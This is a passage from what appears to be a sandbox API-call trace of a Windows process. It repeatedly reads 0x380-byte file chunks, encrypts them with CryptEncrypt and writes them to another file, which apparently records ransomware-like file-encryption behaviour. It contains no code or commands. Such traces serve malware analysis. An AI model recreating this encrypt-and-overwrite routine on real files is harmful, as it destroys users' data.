lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.468] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.469] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.469] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.469] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.469] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.469] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.469] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.469] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.469] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.469] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.470] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.470] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.470] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.470] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.470] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.470] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.470] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.470] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.470] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.470] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.471] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.471] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.471] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.471] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.471] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.471] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.471] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.471] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.471] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.471] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.471] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.471] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.471] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.471] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.471] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.472] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.472] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.472] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.472] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.472] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.472] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.472] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.472] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.472] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.472] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.472] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.472] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.472] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.472] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.473] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.473] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.473] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.473] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.473] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.473] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.473] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.473] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.473] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.473] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.474] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.474] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.474] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.474] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.474] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.474] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.474] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.474] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.474] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.474] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.475] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.475] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.475] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.475] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.475] CryptEncrypt (in: 